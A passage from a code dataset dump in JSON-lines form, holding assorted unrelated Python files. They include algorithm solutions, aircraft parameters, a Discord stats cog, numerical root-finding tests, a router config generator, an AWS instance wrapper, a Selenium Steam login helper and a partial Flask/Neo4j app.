the following rows:\n¤\n¤ ¤\n¤ ¤ ¤\n¤ ¤\n\nBecause the 4th row is incomplete, we return 3.\n\"\"\"\n\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n row = 1\n while True:\n if row*(row+1) > 2*n:\n return row - 1\n else:\n row += 1\n \n# top solution O(1)\n# 1 + 2 + 3 + 4 + 5 + 6 + 7 + ... + x <= n\n# (x * ( x + 1)) / 2 <= n`\n# a = 1, b = 1, c = -2*n\n# x = (-1 + sqrt(1 - 4*1*(-2*n))) / 2\n# simplify: x = (-1 + sqrt(1 + 8.0*n)) / 2 \nimport math\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n return int((-1 + math.sqrt(1 + 8*n)) // 2) \n \n# top solution \n# binary search O(logn)\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n start, end= 0, n\n while start <= end:\n mid = start + (end - start) // 2\n if mid * (mid + 1) <= 2* n:\n start = mid + 1\n else:\n end = mid - 1\n return int(start - 1)","sub_path":"math/441.ArrangingCoins.py","file_name":"441.ArrangingCoins.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"48871130","text":"a=input(\"Enter:\")\n\nif a=='Hello':\n print('1 -google_kz.txt 2-google_paris.txt 3-google_uar.txt')\n b=int(input())\nif b==1:\n myfile1 = open('google_kz.txt','w')\n print(\"Name of a file is: \",myfile1.name)\n myfile1.write(input())\n print(myfile1)\n myfile1.close()\nelif b==2:\n myfile2=open('google_paris','w')\n print(\"Name of a file is: \",myfile2.name)\n myfile2.write(input())\n print(myfile2)\n myfile2.close()\nelif b==3:\n myfile3=open('google-uar', 'w')\n print(\"Name of a file is: \",myfile3.name)\n myfile3.write(input())\n print(myfile3)\nmyfile3.close()","sub_path":"part2_task17.py","file_name":"part2_task17.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"259204877","text":"\"\"\"Module which contains the information required about the aircraft\"\"\"\n\naircraft_data = {\n \"air_conditions_and_anti_icing_coefficient\": 1.0,\n \"brake_material\": \"composites\", # (composites, metal)\n \"capture_area_per_inlet\": 1.0,\n \"duct_material_factor\": 1.0,\n \"duct_shape_factor\": 1.0,\n \"duct_type\": 1.0,\n \"energy_absorption_required\": 1.0,\n \"engine_control_engine_type_coefficient\": 1.0,\n \"engine_weight\": 1.0,\n \"engine_type\": \"turbojet\", # (turbofan, turbojet, turboprop, reciprocating)\n \"fuel_system_type\": \"both\", # (self, non, both)\n \"fuselage_length\": 1.0,\n \"htp_total_planform_area\": 1.0,\n \"htp_thickness_at_root\": 1.0,\n \"htp_span\": 1.0,\n \"inlet_factor\": 1.0,\n \"instruments\": 1.0,\n \"is_dump_and_drain\": True,\n \"is_engine_wing_or_body_mounted\": \"wing\",\n \"is_full_round_spike_intake\": False,\n \"is_gravity_control\": True,\n \"is_half_spike_intake\": False,\n \"is_in_flight_refuel\": False,\n \"is_internal_engines\": False,\n \"is_turbofan\": False,\n \"is_turbojet\": True,\n \"is_variable_engine_intake\": False,\n \"leading_edge_sweep\": 1.0,\n \"maximum_dynamic_pressure\": 1.0,\n \"maximum_fuselage_height\": 1.0,\n \"maximum_sea_level_mach_number\": 1.0,\n \"maximum_thickness_ratio\": 1.0,\n \"maximum_static_pressure_at_engine_compressor_face\": 1.0,\n \"number_of_attendants\": 1.0,\n \"number_of_crew\": 1.0,\n \"number_of_crew_bunks\": 1.0,\n \"number_of_engines\": 1.0,\n \"number_of_flight_deck_stations\": 1.0,\n \"number_of_inlets\": 1.0,\n \"number_of_passengers\": 1.0,\n \"number_of_pilots\": 1.0,\n \"preload_provision\": 1.0,\n \"pressurized_volume\": 1.0,\n \"ramp_length_forward_of_throat_per_inlet\": 1.0,\n \"ratio_of_htp_height_to_vtp_height\": 1.0,\n \"rudder_area\": 1.0,\n \"sandwich_ratio\": 1.0,\n \"starter_type\": \"electrical\", # (electrical, pneumatic, cartridge) - value dependent on engine type, see docs\n \"subsonic_duct_length_per_inlet\": 1.0,\n \"surface_control_coefficient\": 1.0,\n \"sweep_at_half_chord\": 1.0,\n \"tail_moment_arm\": 1.0,\n \"takeoff_weight\": 1.0,\n \"taper_ratio\": 1.0,\n \"temperature_correction_factor\": 1.0,\n \"thickness_of_htp_root\": 1.0,\n \"toilet_ratio\": 1.0,\n \"total_fuselage_fuel\": 1.0,\n \"total_surface_control_area\": 1.0,\n \"total_wing_fuel\": 1.0,\n \"ultimate_cabin_pressure\": 1.0,\n \"ultimate_load_factor\": 1.0,\n \"vtp_area\": 1.0,\n \"vtp_aspect_ratio\": 1.0,\n \"vtp_quarter_chord_sweep\": 1.0,\n \"vtp_taper_ratio\": 1.0,\n \"weight_of_electronics_system\": 1.0,\n \"weight_of_engine\": 1.0,\n \"weight_of_fuel_system\": 1.0,\n \"wing_area\": 1.0,\n \"wing_aspect_ratio\": 1.0,\n \"wing_mac\": 1.0,\n \"wing_span\": 1.0,\n \"wing_variable_sweep_structural_factor\": 1.0\n}\n","sub_path":"performance/mass_estimation/old/nicolai/aircraft_info.py","file_name":"aircraft_info.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"543499561","text":"# Put here for ease of use with statcord\nfrom discord.ext import commands\nfrom bot_config import OWNER_ID\nimport statcord\nimport os\nimport dbl\nfrom pprint import pprint\n\n\nSTATCORD_TOKEN = os.getenv(\"STATCORD_TOKEN\")\nTOP_TOKEN = os.getenv(\"TOP_TOKEN\")\nTOP_AUTH = os.getenv(\"TOP_HOOK_AUTH\")\n\n\nclass StatcordPost(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.key = STATCORD_TOKEN\n self.api = statcord.Client(self.bot, self.key)\n self.api.start_loop()\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n if str(ctx.message.author.id) == str(OWNER_ID):\n return\n self.api.command_run(ctx)\n\n\nclass TopGG(commands.Cog):\n \"\"\"Handles interactions with the top.gg API\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.token = TOP_TOKEN\n self.dblpy = dbl.DBLClient(\n self.bot, self.token, autopost=True,\n )\n # Autopost will post your guild count every 30 minutes\n\n async def on_guild_post():\n print(\"Posted to top.gg\")\n\n\ndef setup(bot):\n bot.add_cog(StatcordPost(bot))\n bot.add_cog(TopGG(bot))\n","sub_path":"cogs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"313453620","text":"#!/usr/bin/env python3\n\nimport math\nfrom scipy import optimize\nfrom sympy.abc import x\nfrom sympy import diff\nfrom sympy import lambdify\n\nfrom numerico.raizes.bisseccao import bisseccao\nfrom numerico.raizes.falsaposicao import falsaposicao\nfrom numerico.raizes.pontofixo import pontofixo1\nfrom numerico.raizes.pontofixo import pontofixo2\nfrom numerico.raizes.newtonraphson import newtonraphson\nfrom numerico.raizes.secante import secante\n\neps = 1e-15\n\n\ndef f1(x):\n \"\"\"x * log(x) - 1\"\"\"\n return x * math.log(x) - 1\n\n\ndef f2(x):\n \"\"\"x**3 - 9*x + 3\"\"\"\n return x**3 - 9 * x + 3\n\n\ndef phi(x):\n \"\"\"x**3/9 + 1/3\"\"\"\n return x**3 / 9 + 1 / 3\n\n\ndef f3(x):\n \"\"\"sin(x)\"\"\"\n return math.sin(x)\n\n\ndef main():\n print('\\n', f1.__doc__)\n f1raiz1 = bisseccao(f1, intervalo=[1, 10])\n f1raiz2 = falsaposicao(f1, intervalo=[1, 10])\n f1raiz4 = pontofixo2(f1, x0=2.6)\n # This calculates the f1'\n f1_ = lambdify(x, diff(f1.__doc__))\n f1raiz6 = newtonraphson(f1, f1_, 2.6)\n\n f1raiz7 = secante(f1, 1, 10)\n\n print(\"Bisseccao\", f1raiz1, f1(f1raiz1))\n print(\"FalsPosic\", f1raiz2, f1(f1raiz2))\n print(\"PontoFix2\", f1raiz4)\n print(\"NewtonRap\", f1raiz6, f1(f1raiz6))\n print(\"Secante \", f1raiz7, f1(f1raiz7))\n\n print('\\n', f2.__doc__)\n f2raiz1 = bisseccao(f2, intervalo=[-1, 1])\n f2raiz2 = falsaposicao(f2, intervalo=[-1, 1])\n f2raiz3 = pontofixo1(f2, phi, x0=0.3)\n f2raiz4 = pontofixo2(f2, x0=0.3)\n\n # This calculates the f2'\n f2_ = lambdify(x, diff(f2.__doc__))\n\n f2raiz6 = newtonraphson(f2, f2_, 0.3)\n f2raiz7 = secante(f2, -1, 1)\n print(\"Bisseccao\", f2raiz1, f2(f2raiz1))\n print(\"FalsPosic\", f2raiz2, f2(f2raiz2))\n print(\"PontoFix1\", f2raiz3, f2(f2raiz3))\n print(\"PontoFix2\", f2raiz4, f2(f2raiz4))\n print(\"SCIPYMPF \", f2raiz5, f2(f2raiz5))\n print(\"NewtonRap\", f2raiz6, f2(f2raiz6))\n print(\"Secante \", f2raiz7, f2(f2raiz7))\n\n print('\\n', f3.__doc__)\n f3raiz1 = bisseccao(f3, intervalo=[-1, 1], tol=eps)\n f3raiz2 = falsaposicao(f3, intervalo=[-1, 1], xtol=eps, ytol=eps)\n f3raiz4 = pontofixo2(f3, x0=0.1, tol=eps, maxiter=500)\n\n # This calculates the f3'\n f3_ = lambdify(x, diff(f3.__doc__))\n f3raiz6 = newtonraphson(f3, f3_, 0.5)\n f3raiz7 = secante(f3, -1, 1)\n\n print(\"Bisseccao\", f3raiz1, f3(f3raiz1))\n print(\"FalsPosic\", f3raiz2, f3(f3raiz2))\n print(\"PontoFix2\", f3raiz4, f3(f3raiz4))\n print(\"NewtonRap\", f3raiz6, f3(f3raiz6))\n print(\"Secante \", f3raiz7, f3(f3raiz7))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numerico/raiz/testes/raizes.py","file_name":"raizes.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433476908","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n#\n# @AUTHOR: Rabbir\n# @FILE: \\rab_python_packages\\rab_steam.py\n# @DATE: 2021/02/03 Wed\n# @TIME: 17:18:46\n#\n# @DESCRIPTION: 共通 Steam 模块(操作基本基于 Selenium)\n\n\nimport hmac\nimport time\nimport base64\nimport struct\nimport selenium\nfrom hashlib import sha1\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom rab_python_packages import rab_logging\n\n\n# 日志记录\nrab_steam_logger = rab_logging.build_rab_logger()\n\n\n\"\"\"\n@description: r_steam 类\n-------\n@param:\n-------\n@return:\n\"\"\"\nclass r_steam:\n\n \"\"\"\n @description: 初始化\n -------\n @param:\n -------\n @return:\n \"\"\"\n def __init__(self, driver, username, password, token_flg=False, \\\n shared_secret=None, identity_secret=None):\n self.driver = driver\n self.username = username\n self.password = password\n # 令牌标识\n self.token_flg = token_flg\n # 令牌分享码\n self.shared_secret = shared_secret\n self.identity_secret = identity_secret\n\n \"\"\"\n @description: 切换至 Steam 登录窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_steam_login_window(self, exclude_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 判断不包含排除字段但是包含 STEAM 字段的窗口即为 STEAM 登录窗口\n if (exclude_field.lower() not in str(self.driver.title).lower()\n and \"steam\" in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n \n \"\"\"\n @description: 切换回原窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_origin_window(self, fill_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 包含满足要求字段的窗口即为原窗口\n if (fill_field.lower() in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n\n \"\"\"\n @description: 生成 STEAM 登录一次性令牌\n -------\n @param:\n -------\n @return:\n \"\"\"\n def generate_one_time_code(self):\n timestamp = int(time.time())\n time_buffer = struct.pack(\">Q\", timestamp//30)\n time_hmac = hmac.new(base64.b64decode(self.shared_secret),\n time_buffer,\n digestmod=sha1).digest()\n begin = ord(time_hmac[19:20]) & 0xf\n full_code = struct.unpack(\">I\",\n time_hmac[begin:begin+4])[0] & 0x7fffffff\n chars = \"23456789BCDFGHJKMNPQRTVWXY\"\n code = \"\"\n for j in range(5):\n full_code, i = divmod(full_code, len(chars))\n code += chars[i]\n return code\n\n \"\"\"\n @description: 在 STEAM 登录界面实现登录\n -------\n @param:\n -------\n @return:\n \"\"\"\n def do_steam_login(self):\n try:\n # 等待登录按钮出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='imageLogin']\")))\n # 检查是否已经登录\n try:\n time.sleep(1)\n # 如果有当前账户名说明已经登录完成了\n account_div = self.driver.find_element_by_class_name(\n \"OpenID_loggedInAccount\")\n logined_flg = True\n except Exception as e:\n logined_flg = False\n # 登录的情况下进行登出操作\n if (logined_flg):\n print(\"Steam 当前已经处于登录状态,尝试登出...\")\n # 选择登出这个账号\n logout_div_a = self.driver.find_element_by_xpath(\n \"//div[@class='OpenID_Logout']/a\")\n logout_div_a.click()\n # STEAM 用户名输入框\n steam_account_name_input = self.driver \\\n .find_element_by_id(\"steamAccountName\")\n # STEAM 密码输入框\n steam_password_input = self.driver \\\n .find_element_by_id(\"steamPassword\")\n # 输入用户名和密码\n steam_account_name_input.send_keys(self.username)\n steam_password_input.send_keys(self.password)\n # 点击登录按钮\n self.driver.find_element_by_id(\"imageLogin\").click()\n # 无令牌的情况下或者当前已经是登录状态就算登录成功\n if (not self.token_flg):\n return True\n else:\n # 等待需要令牌的弹窗出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='twofactorcode_entry']\")))\n twofactorcode_entry_input = self.driver.find_element_by_id(\n \"twofactorcode_entry\")\n # 等待三秒弹窗可见后,生成并输入令牌\n time.sleep(3)\n twofactorcode_entry_input.send_keys(\n self.generate_one_time_code())\n # 提交按钮\n submit_btn = self.driver.find_element_by_xpath(\n \"//div[@id='login_twofactorauth_buttonset_entercode']/div\")\n submit_btn.click()\n return True\n except Exception as e:\n # 登录失败\n rab_steam_logger.error(\"Steam 登录界面操作出错!错误信息:\" + str(e))\n return False\n\n \"\"\"\n @description: 等待 Steam 登录成功并自动关闭窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def wait_steam_login_success(self, fill_field):\n for i in range(0, 10):\n if (len(self.driver.window_handles) == 1\n and fill_field.lower() in str(self.driver.title).lower()):\n return True\n else:\n time.sleep(2)\n continue\n return False\n\n\n\"\"\"\n@description: 单体测试\n-------\n@param:\n-------\n@return:\n\"\"\"\nif __name__ == \"__main__\":\n print(\"todo...\")\n","sub_path":"rab_steam.py","file_name":"rab_steam.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"20098691","text":"import inspect\nimport contextlib\nimport io\n\n\ndef write_stat(name, content):\n \"\"\"\n Utility function to pretty-print multi-line information in the following form:\n [Name]: [line 1]\n [line 2]\n ...\n :param name: Name of the stat\n :param content: The potentially multi-line information to be printed\n \"\"\"\n content = content.replace(\"\\n\", \"\\n\\t\")\n print(f\"{name}:\\t{content}\")\n\n\ndef reflect(func):\n \"\"\"\n Quine is a program which takes no input but outputs a copy of its own code.\n So function reflect is not a quine, because:\n 1. It takes function as input.\n 2. Its output depends on a given function rather than producing it by itself.\n\n Decorator that show certain stats and the source code on the wrapped function.\n :param func: Function to be wrapped\n \"\"\"\n\n def wrapper(*args, **kwargs):\n stdout_redir = io.StringIO()\n with contextlib.redirect_stdout(stdout_redir):\n func(*args, **kwargs)\n\n output = stdout_redir.getvalue()\n source = inspect.getsource(func)\n\n sourcelines, _ = inspect.getsourcelines(func)\n \n # Output\n write_stat(\"Name\", func.__name__)\n write_stat(\"Type\", str(type(func)))\n write_stat(\"Sign\", str(inspect.signature(func)))\n print()\n write_stat(\"Args\", f\"positional {args}\\nkey=worded {kwargs}\")\n print()\n write_stat(\"Doc\", str(inspect.getdoc(func)))\n print()\n write_stat(\"Source\", source)\n # For some reason, inspect.getsource adds a newline at the end of the function,\n # thus no print() here\n write_stat(\"Output\", output)\n print()\n\n return wrapper\n","sub_path":"Assignment3/3/reflect.py","file_name":"reflect.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"326896499","text":"import random\nimport math\nimport os\nimport re\nimport sys\n\nimport dijkstras\n\nfrom router import RouteInfos\n\nsys.path.append('../')\n\n# ////////////////////////////// OPTIONS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ #\n# Router ids must be sequential, starting from 1, skipping no numbers.\nundir_adj_list = \"\"\"\n1:2\n\"\"\"\n\nexample_num = \"10\"\nupdate_period = \"5\"\nmin_cost = 1\nmax_cost = 1\n\n# Used to weight costs.\naverage_cost = None # Can be set to None to have no weighting in the range (min_cost, max_cost)\n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ OPTIONS ////////////////////////////// #\n\n# Build the costs list, containing the costs that routers will randomly choose from, if costs arent defined in adj list.\nif average_cost:\n cost_range = max_cost - min_cost + 1\n costs = []\n # Decent guess at costs with given average.\n for i in range(min_cost, max_cost + 1):\n try:\n amount = round(cost_range / (abs(i - average_cost)))\n except ZeroDivisionError:\n amount = cost_range * 5\n costs += [i] * amount\n # Brute force until the average of the costs is far better.\n while True:\n costs_average = sum(costs)/len(costs)\n difference = costs_average - average_cost\n if abs(difference) < 0.0001:\n break\n if difference > 0:\n costs.append(random.randint(min_cost, math.floor(average_cost)))\n else:\n costs.append(random.randint(math.ceil(average_cost), max_cost))\nelse:\n costs = [i for i in range(min_cost, max_cost + 1)]\n\n\n# Check given undirected adjacency list\nrouter_ids = set(\n map(\n int,\n [item for item in map(str.strip, re.split(\"[:,]|(?:\\n|\\r\\n|\\r)\", undir_adj_list.strip())) if item.isdigit()]\n )\n)\nexpected_router_ids = set(range(1, int(max(router_ids)) + 1))\nif router_ids != expected_router_ids:\n print(\"Malformed adjacency list given.\")\n print(\"The following router ids were skipped:\", expected_router_ids - router_ids)\n exit()\n\n\nclass Edge(frozenset):\n def __new__(cls, *args):\n return super().__new__(cls, args)\n\n def __str__(self):\n return str(set(map(str, self)))\n\n def __repr__(self):\n return str(set(map(str, self)))\n\n\n# Warn if example configuration already exists.\nconfig_path = \"../configurations/example-\" + example_num + \"/\"\nif os.path.isdir(config_path):\n confirm = input(\n \"Example {} already exists. Enter 'y' to confirm overwrite (will invalidate any diagrams): \".format(example_num)\n ).strip().lower()\n if confirm != \"y\":\n exit()\n\n# Build the edges dictionary, mapping edges (immutable pairs of router ids) to costs (randomly generated), and\n# build the connections dictionary, mapping router ids to the set of routers they are connected to.\nedge_costs = {}\nconnections = {str(i): set() for i in router_ids}\nfor line in undir_adj_list.strip().splitlines():\n line = line.strip()\n parts = line.split(\":\")\n router = parts[0]\n\n full_neighbours = set(parts[1].split(\",\"))\n for neighbour in full_neighbours:\n cost_parts = neighbour.split('w')\n neighbour = cost_parts[0]\n if len(cost_parts) > 1:\n edge_costs[Edge(router, neighbour)] = int(cost_parts[1])\n else:\n edge_costs[Edge(router, neighbour)] = random.choice(costs)\n\n neighbours = set([part.split('w')[0] for part in parts[1].split(\",\")])\n\n connections[router] |= neighbours\n for neighbour in neighbours:\n connections[neighbour] |= {router}\n\n# Build the Graph object.\ngraph = dijkstras.Graph()\nfor router_id in connections:\n graph.add_node(router_id)\nfor edge, cost in edge_costs.items():\n graph.add_edge(*edge, distance=cost)\n\n# Initialise both output matrices.\nnum_routers = len(connections.keys())\nnum_edges = len(edge_costs.keys())\nadjacency_matrix = [[0 for i in range(num_routers)] for j in range(num_routers)]\nincidence_matrix = [[0 for k in range(num_edges)] for l in range(num_routers)]\n\n# Build both output matrices.\nfor edge_num, ((node_1, node_2), cost) in enumerate(edge_costs.items()):\n adjacency_matrix[int(node_1) - 1][int(node_2) - 1] = cost\n adjacency_matrix[int(node_2) - 1][int(node_1) - 1] = cost\n\n incidence_matrix[int(node_1) - 1][edge_num] = cost\n incidence_matrix[int(node_2) - 1][edge_num] = cost\n\n# Cross check matrices validity\npassed = True\nfor column in zip(*incidence_matrix):\n cost = max(column)\n node_1, node_2 = [index + 1 for index, cost in enumerate(column) if cost != 0]\n\n passed = adjacency_matrix[int(node_1) - 1][int(node_2) - 1] == cost if passed else False\n passed = adjacency_matrix[int(node_2) - 1][int(node_1) - 1] == cost if passed else False\ncount = 0\nfor index_1, row in enumerate(adjacency_matrix):\n for index_2, cost in enumerate(row):\n column = [0 for _ in range(num_routers)]\n router_id_1 = index_1 + 1\n column[index_1] = cost\n column[index_2] = cost\n if any(column):\n passed = column in [list(tuple_column) for tuple_column in zip(*incidence_matrix)] if passed else False\n count += 1\npassed = count / 2 == num_edges if passed else False\nif not passed:\n print(\"Sorry! Matrices malformed.\")\n exit()\n\n# Build config files needed for router operation.\n\n\ndef pad_zero(str_num):\n if len(str_num) == 2:\n return str_num\n elif len(str_num) == 1:\n return \"0\" + str_num\n\nfor router in connections:\n config = \"router-id \" + router + \"\\n\"\n config += \"input-ports \"\n for neighbour in connections[router]:\n config += \"5\" + pad_zero(router) + pad_zero(neighbour) + \", \"\n config = config[:-2]\n config += \"\\noutputs \"\n for neighbour in connections[router]:\n cost = edge_costs[Edge(router, neighbour)]\n config += \"5\" + pad_zero(neighbour) + pad_zero(router) + \"/\" + str(cost) + \"/\" + neighbour + \", \"\n config = config[:-2]\n config += \"\\nupdate-period \" + update_period\n config_filename = \"example-\" + example_num + \"-config-\" + router + \".txt\"\n os.makedirs(os.path.dirname(config_path), exist_ok=True)\n with open(config_path + config_filename, \"w+\") as config_file:\n config_file.write(config)\n\n# Build expected converged routing table files\nfor router_id in router_ids:\n router_id = str(router_id)\n converged_routing_table = \"{\\n\"\n for target_router_id in router_ids:\n target_router_id = str(target_router_id)\n if router_id == target_router_id:\n continue\n try:\n cost, path = dijkstras.shortest_path(graph, router_id, target_router_id)\n if cost >= 16:\n print(\"WARNING! A minimum cost path of {} was found (16 or higher).\".format(cost))\n input(\"Enter anything to continue...\")\n first_hop = path[1] # path[0] is router_id itself.\n converged_routing_table += '\\t\"{}\": {{\\n'.format(target_router_id)\n converged_routing_table += '\\t\\t\"{}\": {},\\n'.format(RouteInfos.FIRST_HOP, first_hop)\n converged_routing_table += '\\t\\t\"{}\": {}\\n'.format(RouteInfos.COST, cost)\n converged_routing_table += \"\\t},\\n\"\n except KeyError:\n print(\"Could not create a path between two nodes of the graph. This probably means the graph described \"\n \"by your adjacency list is disjoint\")\n exit(1)\n converged_routing_table = converged_routing_table[0:-2]\n converged_routing_table += \"\\n}\"\n expected_dir_path = config_path + \"converged-routing-tables/\"\n os.makedirs(os.path.dirname(expected_dir_path), exist_ok=True)\n with open(expected_dir_path + \"routing-table-\" + router_id + \".json\", \"w+\") as expected_file:\n expected_file.write(converged_routing_table)\n\n# Print results.\nprint(\"\\nConfig files successfully created for example network\", example_num + \".\\n\")\nprint(\"VISUALISE USING THIS ONLINE TOOL: http://graphonline.ru/en/\")\nprint(\"\\nADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n print(\",\".join(map(str, line)))\nprint(\"\\nNO COST ADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n line = [1 if i != 0 else 0 for i in line]\n print(\",\".join(map(str, line)))\nprint(\"\\nINCIDENCE MATRIX:\")\nfor line in incidence_matrix:\n print(\",\".join(map(str, line)))\n","sub_path":"scripts/example_config_generator.py","file_name":"example_config_generator.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"319231862","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/ndg/xacml/parsers/etree/actionreader.py\n# Compiled at: 2011-02-11 08:34:11\n\"\"\"NDG XACML ElementTree based parser for Action type\n\nNERC DataGrid\n\"\"\"\n__author__ = 'P J Kershaw'\n__date__ = '16/03/10'\n__copyright__ = '(C) 2010 Science and Technology Facilities Council'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__license__ = 'BSD - see LICENSE file in top-level directory'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__revision__ = '$Id: actionreader.py 7109 2010-06-28 12:54:57Z pjkersha $'\nfrom ndg.xacml.core.action import Action\nfrom ndg.xacml.parsers.etree.targetchildreader import TargetChildReader\n\nclass ActionReader(TargetChildReader):\n \"\"\"ElementTree based parser for Action type\n @cvar TYPE: XACML type to instantiate from parsed object\n @type TYPE: type\n \"\"\"\n TYPE = Action","sub_path":"pycfiles/ndg_xacml-0.5.1-py2.7/actionreader.py","file_name":"actionreader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"29781321","text":"import mock\n\nfrom mopidy.utils import locale_decode\n\nfrom tests import unittest\n\n\n@mock.patch('mopidy.utils.locale.getpreferredencoding')\nclass LocaleDecodeTest(unittest.TestCase):\n def test_can_decode_utf8_strings_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n result = locale_decode(\n '[Errno 98] Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_can_decode_an_ioerror_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n error = IOError(98, 'Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n result = locale_decode(error)\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_does_not_use_locale_to_decode_unicode_strings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode(u'abc')\n\n self.assertFalse(mock.called)\n\n def test_does_not_use_locale_to_decode_ascii_bytestrings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode('abc')\n\n self.assertFalse(mock.called)\n","sub_path":"tests/utils/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"617960780","text":"class Instance(object):\n def __init__(self, obj):\n self.id = obj.id\n self.tags = obj.tags\n self.size = obj.instance_type\n self.launch_time = obj.launch_time\n self._placement = obj.placement\n self._state = obj.state\n self._os = guess_os(obj)\n self._reserved = False\n self._prices = {\n 'current': 0.0,\n 'best': 0.0,\n }\n\n @property\n def current(self):\n return self._prices['current']\n\n @current.setter\n def current(self, value):\n self._prices['current'] = value\n\n @property\n def best(self):\n return self._prices['best']\n\n @best.setter\n def best(self, value):\n self._prices['best'] = value\n\n @property\n def reserved(self):\n if self._reserved:\n return 'Yes'\n else:\n return 'No'\n\n @reserved.setter\n def reserved(self, value):\n if value == 'Yes':\n self._reserved = True\n elif value == 'No':\n self._reserved = False\n else:\n raise ValueError\n\n @property\n def name(self):\n names = [tag for tag in self.tags if tag['Key'] == 'Name']\n if names is None:\n return ''\n else:\n return names[0]['Value']\n\n @property\n def availability_zone(self):\n return self._placement['AvailabilityZone']\n\n @property\n def region(self):\n return self._placement['AvailabilityZone'][:-1]\n\n @property\n def key(self):\n return self._os[1]\n\n @property\n def operating_system(self):\n return self._os[0]\n\n @property\n def state(self):\n return self._state['Name']\n\n def match_reserved_instance(self, reserved):\n if any((self.state != 'running',\n reserved['State'] != 'active',\n reserved['InstancesLeft'] == 0,\n reserved['ProductDescription'] != self.operating_system,\n reserved['InstanceType'] != self.size,\n reserved['AvailabilityZone'] != self.availability_zone)):\n return False\n return True\n\n\ndef guess_os(instance):\n console_output = instance.console_output()['Output']\n if 'Windows' in console_output:\n return ('Windows', 'win')\n else:\n if 'RHEL' in console_output:\n return ('Red Hat Enterprise Linux', 'rhel')\n elif 'SUSE' in console_output:\n return ('SUSE Linux', 'suse')\n else:\n return ('Linux/UNIX', 'linux')\n","sub_path":"accloudtant/aws/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"398577405","text":"# coding=utf-8\nfrom flask import Flask, jsonify, render_template\nfrom neo4j import GraphDatabase\nfrom flask import request\nfrom py2neo import Graph,Node,Relationship\n\ndriver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=(\"neo4j\",\"neo4j\")) #认证连接数据库\n\napp = Flask(__name__) #flask框架必备\ngraph = Graph()\n\n\ndef buildNodes(nodeRecord):\n data = {\"id\": str(nodeRecord.n._id), \"label\": next(iter(nodeRecord.n.labels))}\n data.update(nodeRecord.n.properties)\n\n return {\"data\": data}\n\ndef buildEdges(relationRecord):\n data = 